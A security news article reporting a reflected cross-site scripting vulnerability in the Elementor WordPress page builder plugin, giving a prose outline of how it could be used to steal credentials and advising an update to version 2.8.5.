Vulnerability in Elementor, page builder plugin, affects more than 4 million WordPress sites

When a new security flaw is reported in a software development, it starts a race between vulnerability testing experts in charge of correcting it and cybercriminals who want to exploit the flaws. This is especially notable as for the most commonly used products, such as some WordPress plugins.

Elementor, one of the world’s most popular plugins, presents a vulnerability dubbed XSS Authenticated Reflection, whose exploitation would allow threat actors to run scripts on WordPress sites from another site to deploy malicious activities such as theft of access credentials.

Vulnerability testing experts mention that the flaw depends on the loading of a script in the vulnerable site using, for example, a search box. A possible exploitation scenario is described below:

  • A threat actor creates a specially designed URL for the attack
  • When the victim follows the URL, the script, which is hosted on an external site, will be run
  • The hacker will send a link to target users to steal their credentials from the attacked website

This flaw has already been reported on WordPress Vulnerability Database, a platform that contains updated information about any vulnerability found in the content management system and its most popular plugins. The administrators reported that, in order to avoid exploitation in the wild, the proof of concept will remain unpublished until at least February 12.

The vulnerability was found by security firm, which reported it to Elementor editors as soon as possible. WordPress visual builder developers immediately fixed the flaw. The vulnerability was publicly disclosed once its remediation was completed.

Specialists in vulnerability testing from the International Institute of Cyber Security (IICS) mention that the flaw affects Elementor versions 2.8.4 and earlier. The new version, 2.8.5, must be updated from the admin interface of WordPress sites. After logging in, you will find an update link on your WordPress page; otherwise, you can update the plugin from the website administrator sidebar.